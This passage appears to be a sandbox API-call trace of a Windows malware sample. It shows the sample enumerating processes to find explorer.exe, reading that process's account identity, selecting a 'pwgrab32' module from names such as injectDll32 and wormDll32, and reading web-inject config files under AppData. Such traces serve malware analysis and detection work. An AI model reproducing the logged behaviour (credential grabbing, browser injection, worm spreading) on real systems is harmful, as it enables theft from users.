	[0241.257] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.258] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.258] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.259] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.259] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.260] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.260] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.261] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.261] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.262] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.262] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.263] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.263] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0241.263] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0241.263] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.264] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.264] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0241.265] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0241.265] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0241.266] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0241.266] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.267] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.267] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.268] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0241.268] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0241.269] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0241.269] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0241.270] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0241.270] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0241.271] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0241.271] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0241.272] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0241.272] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0241.273] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0241.273] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0241.274] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0241.274] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0241.275] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0241.275] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0241.276] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0241.276] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0241.277] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0241.277] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0241.278] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0241.278] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0241.279] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0241.279] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0241.280] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0241.280] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0241.281] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0241.281] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0241.282] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0241.282] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0241.282] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0241.283] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0241.283] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0241.283] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0241.284] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0241.284] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0241.285] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0241.285] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0241.327] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0241.327] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.328] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0241.328] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.329] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0241.329] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0241.330] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0241.330] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0241.331] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0241.331] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.333] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.333] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.333] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.334] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.334] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.334] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.335] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.335] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.336] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0241.336] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.337] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.337] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.338] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.338] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0241.339] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0241.339] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0241.340] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0241.340] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0241.341] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0241.341] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.341] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0241.342] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0241.342] CloseHandle (hObject=0x6e4) returned 1
	[0241.342] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1828
	[0241.342] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1858
	[0241.342] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311e70
	[0241.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x6e4
	[0241.343] OpenProcessToken (in: ProcessHandle=0x6e4, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x690) returned 1
	[0241.343] GetTokenInformation (in: TokenHandle=0x690, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0241.343] GetLastError () returned 0x7a
	[0241.343] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x27dae98
	[0241.343] GetTokenInformation (in: TokenHandle=0x690, TokenInformationClass=0x1, TokenInformation=0x27dae98, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x27dae98, ReturnLength=0x128c98) returned 1
	[0241.343] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x27daea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0241.344] CloseHandle (hObject=0x690) returned 1
	[0241.344] CloseHandle (hObject=0x6e4) returned 1
	[0241.344] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0990
	[0241.344] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1828) returned 1
	[0241.345] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c07d8
	[0241.345] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1828
	[0241.345] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311948
	[0241.345] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0241.345] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0241.345] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0241.345] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0241.345] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0241.345] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0241.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c07d8) returned 1
	[0241.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311948) returned 1
	[0241.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1828) returned 1
	[0241.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1858) returned 1
	[0241.345] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x226160
	[0241.345] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0241.345] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0241.345] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0241.345] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0241.345] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0241.345] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0241.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x226160) returned 1
	[0241.345] Sleep (dwMilliseconds=0x4e20) 
	[0241.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x7791ca40, dwHighDateTime=0x1d50a6a)) 
	[0241.376] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0241.376] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.376] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.376] CloseHandle (hObject=0x6e4) returned 1
	[0241.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7791ca40, dwHighDateTime=0x1d50a6a)) 
	[0241.377] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.377] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.377] CloseHandle (hObject=0x6e4) returned 1
	[0241.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7791ca40, dwHighDateTime=0x1d50a6a)) 
	[0241.377] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.377] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.377] CloseHandle (hObject=0x6e4) returned 1
	[0241.377] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7791ca40, dwHighDateTime=0x1d50a6a)) 
